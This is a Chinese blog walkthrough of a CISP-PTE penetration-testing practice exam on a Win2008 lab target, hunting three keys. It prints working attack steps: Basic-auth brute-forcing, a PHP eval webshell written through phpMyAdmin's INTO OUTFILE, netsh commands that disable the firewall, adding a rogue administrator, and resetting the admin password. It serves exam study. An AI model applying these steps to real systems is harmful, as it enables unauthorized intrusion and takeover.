CISP-PTE实操练习之综合题讲解(win2008)
CISP-PTE实操练习之综合题讲解(win2008)
文章目录
- CISP-PTE实操练习之综合题讲解(win2008)
- 前言
- 一、win2008综合题讲解
- 1. 第一个key
- 2. 第二个Key
- 3. 第三个Key
- 二、修改网站密码登录后台
- 1. phpyadmin修改密码
- 2. 登录后台获取key
- 总结
前言
上两期把基础题的两套题都给大家仔细的讲解了,接下来给大家讲解一下综合题的解题方法,那这期PTE的讲解就结束了,下次就是开始内网渗透的学习了,大家要好好复习噢。
一、win2008综合题讲解
环境的话,暂时没有噢,这里就给大家讲解一下思路吧,此题的话就是存在有3个key,大家只需要拿到这3个key就可以了。
1. 第一个key
我以我的靶机ip为例,我靶机的ip地址是192.168.124.132
打开页面ip地址后,出现了需要登录认证的页面,我们随便输入登录看看,输入admin/123
登录失败,并且返回未授权认证的页面,说明的通过账号和密码才能登录进去查看任何页面。
这时,我们拿到一个域名ip,首先要做的是做端口扫描和目录扫描,以及网站扫描。
我们用nmap扫描端口
nmap -sS -p 1-20000 192.168.124.132
扫出来发现有80端口开放,3389开放,进一步我们要做目录扫描,看看有什么网站是存在的
我们打开御剑
当我们扫描时,会出现停止工作,那是因为没有通过授权,是无法扫描ip下的目录的,这里我们需要做的就是爆破账号密码,进行登录,我们可以使用弱口令字典进行爆破。
我们返回刚才那个扥估页面进行抓包
我们将其base64进行解码
点击Ctrl+shift+B进行解码
我们假设账号就是admin,密码是未知的,去爆破密码,我们 设置一下参数。我们将认证的账号和密码的base64的值设置为爆破的参数。
在payload黄色处设置为以上的选择,选项的意思为迭代的意思
位置1添加上admin:
位置2添加密码字典,这里选择已经选择好的password.txt字典
这里还要注意一点,记得添加上Base64编码选项,下面的URL编码选项去掉,不要选上
然后开始爆破,就可以了
图中的长度不同,说明爆破出来了,我们解码看看
右键按以上步骤进行解码
看到密码就是admin:123456。我们进行登录,登录进去是一个dedecms页面,这时,第一个key就出来了。
我们就拿到key:abfcghsk了。
2. 第二个Key
http://admin:123456@192.168.124.133/
这时,我们在用御剑去扫描看一下,发现也扫不出来。这时我们就可以使用burp+御剑的字典一起做一下目录扫描看看
这时,我们抓包,进行爆破目录位置,将其中标黄的位置进行爆破,选择御剑的目录字典。
payload中选择御剑中的dir.txt字典
将下面的URL编码去掉
然后开始攻击
其中状态码为200都是打开的网址和目录,其中dede和phpmyadmin都是存在的,我们打开dede试试
打开是一个登录页面,我们尝试弱口令登录试试,输入admin,bbbb
成功登录了,但是没有什么有价值的东西,我们继续寻找key,我们登录数据库系统phpmyadmin试试
http://192.168.124.133/phpmyadmin/
弱口令登录试试,root/root。
成功登录了。根据提示,key7是在根目录下,我们的思路就是要上传一句话到数据库中,然后蚁剑连接,在根目录下寻找key。
我们选择MySQL数据库,选择SQL选项,执行SQL语句,,查看当前数据库的目录位置。
select @@datadir;
在C:\phpStudy\MySQL\data\目录下,根据以往的经验,网站根目录应该在C:\phpStudy\www目录下,我们就往根目录下写入一句话。
select “<?php eval($_POST['a']);?>” into outfile ‘c:/phpstudy/www/kl.php’;
我们就成功写入了一句话。我们打开一句话时,也没有报错,说明传上去了。
http://192.168.124.133/kl.php
这时我们拿蚁剑连接试试,选择base64,在请求消息那里填写认证信息
Authorizatio
Basic YWRtaW46MTIzNDU2
我们就连接上了
我们找到了key.txt文件。
打开文件后,成功找到了key。
3. 第三个Key
这最后一个key就在靶机的桌面上了,我们就要远程登录到对方的主机上,这时我们就要打开对方的3389端口和关闭防火墙。
我们上传3389.bat文件,用于打开远程登录的3389端口
这里显示上传成功了,我们打开终端运行起来。
这时我们就要关闭防火墙和创建用户进行远程登录,如果创建的用户权限不够,看不到桌面的东西的话,我们就得更改管理员的密码,进行登录获取key。我们一个一个尝试一下。
netsh advfirewall set allprofiles state off
新建用户和密码,且加入管理员组内
net user zhian 2000 /add
net localgroup administrators zhian /add
点击win+R,打开mstsc,打开远程登录
输入zhian,2000
打开桌面是这样的,什么也没有,说明新建的用户权限根本不够,我们只能修改管理员密码进行登录
net user administrator zsbkx1988!
我们连接成功了,key就在桌面上。
到这里个key都拿到了。
二、修改网站密码登录后台
这里作一下扩展,这种题型在我考试的时候就遇到了,我在这里就讲解一下解决方法
1. phpyadmin修改密码
我们首先登录phpyadmin,选择以下数据库
点击dede_admin,就会出现右边的账号和密码,但是密码是童年过MD5加密的。在考试的时候我们是不能连接外网的的,我们就需要修改密码,用自己的密码进行登录。
原来的密码是bbbb,我们将其x修改为aaaa,将其进行MD5加密后替换就可以了。点击右边的MD5 hash就可以了。
74b87337454200d4d33f80c4663dc5e5,但是这里是20位的,我们这个替换后的MD5是32位的,我们需要去前5后7,用来替换,替换后为:
337454200d4d33f80c46
2. 登录后台获取key
修改后密码为aaaa,我们尝试登录看看
我们就拿到了key:123456了。
总结
综合题到这里结束了,整个考试的知识点大概就这么多,大多还是得靠大家平时多练习,多去动手去实操,题目变化大,我们要灵活运用知识点去解题。接下来的文章会给大家分享一下内网渗透方面以及综合靶场渗透里面的知识了。大家要好好复习呀。
CISP-PTE实操练习之综合题讲解(win2008)相关推荐
- 从实操教学到赛题演练,腾讯专家亲授TI-ONE平台操作攻略!
5月10日,我们迎来了"视"界直播周的首场直播--"2021腾讯广告算法大赛赛题解析".直播现场,芦清林和熊江丰老师对本届赛事的两大赛题进行了深入浅出的解析 ...
- 1+X Web前端等级考证 | Web前端开发中级12月最新模拟题 (5套包含理论实操答案)
由于经常分享失败,我上传github上了,先放上链接:https://github.com/Lydever/web-1-x.git 请礼貌,不要耍流氓哈哈,创作不易,下载的同时,请start一下,谢谢 ...
- 企业人力资源管理师(四级)题集(理论+实操(计算题)+职业道德)
天翼云电脑下载地址 https://desk.ctyun.cn:8999/desktop-prod/software/windows_tob_client/15/64/201330005/CtyunC ...
- CISP-PTE认证实操模拟题分享
CSIP-PTE安全认证实操题有五道web题,一道综合题,这篇文章只分享5道web题,此靶场为模拟靶场. SQL注入 通过页面提示,我们要利用sql注入读取/tmp/360/key文件,读取的话就要用 ...
- 计算机考试题 实操,计算机考试实操题.doc
文档介绍: 2017年9月计算机一级MSOffice机考实操题1[简答题] 将考生文件夹下SEED文件夹中的文件CHIRIST.AVE设置为隐藏和只读属性.参考解析:设置文件属性打开考生文件夹中的SE ...
- 高中计算机考试操作题ftp,计算机考试实操题-高中课件精选.doc
计算机考试实操题-高中课件精选.doc 高考 高中教育 2010操作题考题及操作示范 Windows操作题: 请打开试卷目录C:\ZREXAM,按要求完成下列操作: 1.将文件夹"ks&qu ...
- 【网络工程】9、实操-万达酒店综合项目(三)
接上篇<8.实操-万达酒店综合项目(三)> 之前我们按照项目要求进行模拟拓扑的构建实操,完成了办公区部分的网络配置,本篇我们来继续完成其他区域的网络配置. 一.总体架构情况 按照之前项目需 ...
- 【网络工程】8、实操-万达酒店综合项目(二)
接上篇<7.实操-万达酒店综合项目(一)> 之前我们讲解了酒店网络项目的整体需求文档,包括项目背景.总体架构设计以及网络功能域划分.配置标准.路由规划等.本篇我们就来按照项目要求进行模拟拓 ...
- Python青少年等级考试实操题(二级)
//202103 1.实操题: 设计一个停车场收费计算器(收费规则,2小时以内收费5元,超出部分每小时加收2元), 要求如下: (1) 设计的程序要能输入停车时间(单位为小时,输入的小时数为整数): ...
最新文章
- MPB:南土所褚海燕组-小麦相关微生物的野外采样与样品保存
- spark standalone zookeeper HA部署方式
- python语言命令大全-Python常用命令最全合集
- 实战Vue简易项目(2)定制开发环境
- 超详细目标检测,yolo3训练自己的数据集
- 安捷伦or是德信号源+频谱仪操作: 从程控到自动测试 (五)频谱仪截屏到U盘的程控实现
- 奥维互动地图APP不能用了怎么办?有没有什么替代软件?
- 使用EXCEL连接PGSQL
- 逆水寒2021最新服务器,【图片】《逆水寒》2021年4月29日更新公告【逆水寒ol吧】_百度贴吧...
- 数据分析项目实战——Airbnb数据分析
- android 通知 可横幅展示的哦
- csgo社区服务器维护2021,CSGO国际服启动软件
- MySQL忘记root密码解决方案
- 微信商业闭环谈论之微信开放平台实现微信卡券投放实践(附部分JAVA源码)
- python怎么自动化录入数据_Python自动化办公之–读取Excel 录入表单
- SIM7600怎么打电话,怎么电话通信
- C++基础-介绍·数据结构·排序·算法
- C语言,输出变量的地址
- 小项目不适合微服务?别扯犊子了!
- 终于搞清楚了,关于核心线程会不会回收